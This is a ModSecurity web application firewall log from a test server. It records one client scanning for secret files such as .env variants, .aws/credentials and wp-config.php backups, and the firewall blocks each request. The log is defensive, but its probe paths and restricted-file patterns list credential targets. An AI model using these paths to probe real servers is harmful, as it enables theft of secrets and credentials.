[Tue Jan 21 15:18:10.330637 2025] [:error] [pid 621519] [client 193.41.206.36:56192] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.travis"] [unique_id "Z4-sotP2g1a8O8tMN8i_5wAAAA8"]
[Tue Jan 21 15:18:10.331129 2025] [:error] [pid 621519] [client 193.41.206.36:56192] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.travis"] [unique_id "Z4-sotP2g1a8O8tMN8i_5wAAAA8"]
[Tue Jan 21 15:18:10.574920 2025] [:error] [pid 621512] [client 193.41.206.36:39926] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "Z4-sohX999c-l2awnNPVawAAAAI"]
[Tue Jan 21 15:18:10.575324 2025] [:error] [pid 621512] [client 193.41.206.36:39926] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "Z4-sohX999c-l2awnNPVawAAAAI"]
[Tue Jan 21 15:18:10.575829 2025] [:error] [pid 621512] [client 193.41.206.36:39926] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "Z4-sohX999c-l2awnNPVawAAAAI"]
[Tue Jan 21 15:18:12.880600 2025] [:error] [pid 621519] [client 193.41.206.36:56192] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.envrc"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.envrc"] [unique_id "Z4-spNP2g1a8O8tMN8i_6AAAAA8"]
[Tue Jan 21 15:18:12.881083 2025] [:error] [pid 621519] [client 193.41.206.36:56192] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.envrc"] [unique_id "Z4-spNP2g1a8O8tMN8i_6AAAAA8"]
[Tue Jan 21 15:18:12.882632 2025] [:error] [pid 621519] [client 193.41.206.36:56192] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.envrc"] [unique_id "Z4-spNP2g1a8O8tMN8i_6AAAAA8"]
[Tue Jan 21 15:18:12.964349 2025] [:error] [pid 621512] [client 193.41.206.36:39926] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.stage"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "Z4-spBX999c-l2awnNPVbAAAAAI"]
[Tue Jan 21 15:18:12.964812 2025] [:error] [pid 621512] [client 193.41.206.36:39926] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "Z4-spBX999c-l2awnNPVbAAAAAI"]
[Tue Jan 21 15:18:12.965292 2025] [:error] [pid 621512] [client 193.41.206.36:39926] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "Z4-spBX999c-l2awnNPVbAAAAAI"]
[Tue Jan 21 15:18:15.512141 2025] [:error] [pid 621512] [client 193.41.206.36:39926] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.travis"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.travis"] [unique_id "Z4-spxX999c-l2awnNPVbQAAAAI"]
[Tue Jan 21 15:18:15.512546 2025] [:error] [pid 621512] [client 193.41.206.36:39926] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.travis"] [unique_id "Z4-spxX999c-l2awnNPVbQAAAAI"]
[Tue Jan 21 15:18:15.513106 2025] [:error] [pid 621512] [client 193.41.206.36:39926] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.travis"] [unique_id "Z4-spxX999c-l2awnNPVbQAAAAI"]
[Tue Jan 21 15:18:15.650138 2025] [:error] [pid 621519] [client 193.41.206.36:56192] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.envs"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.envs"] [unique_id "Z4-sp9P2g1a8O8tMN8i_6QAAAA8"]
[Tue Jan 21 15:18:15.650781 2025] [:error] [pid 621519] [client 193.41.206.36:56192] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.envs"] [unique_id "Z4-sp9P2g1a8O8tMN8i_6QAAAA8"]
[Tue Jan 21 15:18:15.651349 2025] [:error] [pid 621519] [client 193.41.206.36:56192] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.envs"] [unique_id "Z4-sp9P2g1a8O8tMN8i_6QAAAA8"]
[Tue Jan 21 15:18:18.059500 2025] [:error] [pid 621512] [client 193.41.206.36:39926] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.envrc"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.envrc"] [unique_id "Z4-sqhX999c-l2awnNPVbgAAAAI"]
[Tue Jan 21 15:18:18.060227 2025] [:error] [pid 621512] [client 193.41.206.36:39926] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.envrc"] [unique_id "Z4-sqhX999c-l2awnNPVbgAAAAI"]
[Tue Jan 21 15:18:18.060676 2025] [:error] [pid 621512] [client 193.41.206.36:39926] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.envrc"] [unique_id "Z4-sqhX999c-l2awnNPVbgAAAAI"]
[Tue Jan 21 15:18:20.777625 2025] [:error] [pid 621512] [client 193.41.206.36:39926] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.envs"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.envs"] [unique_id "Z4-srBX999c-l2awnNPVbwAAAAI"]
[Tue Jan 21 15:18:20.778224 2025] [:error] [pid 621512] [client 193.41.206.36:39926] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.envs"] [unique_id "Z4-srBX999c-l2awnNPVbwAAAAI"]
[Tue Jan 21 15:18:20.778732 2025] [:error] [pid 621512] [client 193.41.206.36:39926] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.envs"] [unique_id "Z4-srBX999c-l2awnNPVbwAAAAI"]
[Tue Jan 21 15:20:06.551989 2025] [:error] [pid 621519] [client 193.41.206.36:39634] [client 193.41.206.36] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "Z4-tFtP2g1a8O8tMN8i_7wAAAA8"]
[Tue Jan 21 15:20:06.552189 2025] [:error] [pid 621519] [client 193.41.206.36:39634] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "Z4-tFtP2g1a8O8tMN8i_7wAAAA8"]
[Tue Jan 21 15:20:06.552370 2025] [:error] [pid 621519] [client 193.41.206.36:39634] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "Z4-tFtP2g1a8O8tMN8i_7wAAAA8"]
[Tue Jan 21 15:20:12.694422 2025] [:error] [pid 610122] [client 193.41.206.36:39682] [client 193.41.206.36] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "Z4-tHECs2V2SGwWks_z55AAAAAg"]
[Tue Jan 21 15:20:12.694967 2025] [:error] [pid 610122] [client 193.41.206.36:39682] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "Z4-tHECs2V2SGwWks_z55AAAAAg"]
[Tue Jan 21 15:20:12.696592 2025] [:error] [pid 610122] [client 193.41.206.36:39682] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "Z4-tHECs2V2SGwWks_z55AAAAAg"]
[Tue Jan 21 15:20:45.489937 2025] [:error] [pid 621526] [client 193.41.206.36:44804] [client 193.41.206.36] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php.bak"] [unique_id "Z4-tPfl9UUKBWX7xOcp1OwAAAAU"]
[Tue Jan 21 15:20:45.490327 2025] [:error] [pid 621526] [client 193.41.206.36:44804] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php.bak"] [unique_id "Z4-tPfl9UUKBWX7xOcp1OwAAAAU"]
[Tue Jan 21 15:20:45.490754 2025] [:error] [pid 621526] [client 193.41.206.36:44804] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php.bak"] [unique_id "Z4-tPfl9UUKBWX7xOcp1OwAAAAU"]
[Tue Jan 21 15:20:45.491182 2025] [:error] [pid 621526] [client 193.41.206.36:44804] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php.bak"] [unique_id "Z4-tPfl9UUKBWX7xOcp1OwAAAAU"]
[Tue Jan 21 15:20:48.204922 2025] [:error] [pid 621526] [client 193.41.206.36:44804] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "Z4-tQPl9UUKBWX7xOcp1PAAAAAU"]
[Tue Jan 21 15:20:48.205115 2025] [:error] [pid 621526] [client 193.41.206.36:44804] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "Z4-tQPl9UUKBWX7xOcp1PAAAAAU"]
[Tue Jan 21 15:20:48.205317 2025] [:error] [pid 621526] [client 193.41.206.36:44804] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "Z4-tQPl9UUKBWX7xOcp1PAAAAAU"]
[Tue Jan 21 15:20:51.011188 2025] [:error] [pid 621526] [client 193.41.206.36:44804] [client 193.41.206.36] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".swp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.wp-config.php.swp"] [unique_id "Z4-tQ_l9UUKBWX7xOcp1PQAAAAU"]
[Tue Jan 21 15:20:51.011898 2025] [:error] [pid 621526] [client 193.41.206.36:44804] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.wp-config.php.swp"] [unique_id "Z4-tQ_l9UUKBWX7xOcp1PQAAAAU"]
[Tue Jan 21 15:20:51.012373 2025] [:error] [pid 621526] [client 193.41.206.36:44804] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.wp-config.php.swp"] [unique_id "Z4-tQ_l9UUKBWX7xOcp1PQAAAAU"]
